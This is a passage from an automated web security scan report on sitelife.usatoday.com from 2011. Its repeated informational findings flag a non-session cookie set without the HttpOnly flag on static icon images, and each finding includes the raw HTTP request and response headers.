Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 1849
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "68e18fb51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

GIF89a......................FFFzzz...XXX$$$...............666hhh.............................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!..
...,..........w .. !...DB..A..H.....
...[SNIP]...

14.100. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 339
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "c34392b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:22 GMT
Connection: close

GIF89a........................................................................].............. ..).......................................................................................................
...[SNIP]...

14.101. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/email/pluck-email-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 253
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "c34392b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............................................................|||zzzxxxuuuqqqooollliiieee```]]].........!.......,..........z`..dY.A.......40.@P.......l#.H$..p.9.&.Ub.K.(..A!.(..J%0(G..."R..,.@..D
...[SNIP]...

14.102. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 211
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "c34392b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............cb]`_Z~}x..~.....................III>>>000,,,###..........................................!.......,..........P.%.di.h...X4pS.o<.Np..C.:...x<....X.(".Hp..... C".P.. w+.,..EEP>....en.
...[SNIP]...

14.103. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 391
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "c34392b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

GIF89a.................Ziq9Q.......l......j...........
..N.....,..f..u..Q.....p....a*U8'........y..........mm...........................................................................................
...[SNIP]...

14.104. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 106
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a...............................!.......,........../H...P..b..>.....9.....................=...$.q...;

14.105. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-digg.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 137
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a...............................!.......,..........Nx...%F...uQ.....}Ft.BY.Czxm.n-AY.1..a.....S.@.......#X..Q....r. f.4J...........;

14.106. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-fb.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 345
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............)>k=Z.`x.bz.d{.k..Te.h}.Td.t........;Y.)>j<Z.Mi.Tn.F[.FZ.d|.Tf.k..l..Tf.l..j.i~.w...................................................................................................
...[SNIP]...

14.107. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-ff.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 173
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............C~....S..d..U........q..t.................!.......,..........Zp.Ik.(......".PT.bX.@.D.N.|. X.G>P........CL..)`..2.3-[..k....RYu7......L;.N...=8..-..._D..;

14.108. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 172
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a......................D......T..].`....................!.......,..........Y..D..2..;.^.i.!....F..G."&...!.H!...n.8(..U. L...F!.(.....i.q......~.FBl.K...x,(w!..\=....;

14.109. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 118
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............Cx.g...E..........!.......,..........;x......J9q.)...( .!|]).J!...?4.g.7\G....o......$I...8N-*....;

14.110. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 271
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............xxz...............iji04.^cSMML........K.m,........w.!.........................fff.........!.......,...........`'...e."Td. .p YK".hq.-..Q.S. .4....m...&..X..E.$x. .....\8.. q <&..c..
...[SNIP]...

14.111. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 85
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a...................!.......,..........&....'... .Y-./..u.%...N.T..S.1h........;

14.112. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 378
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a...................Sk.....J.-g..V.U.....D..q...o..]....S...........v...........v..<.J$.-........h.[..............................................................................................
...[SNIP]...

14.113. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 606
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

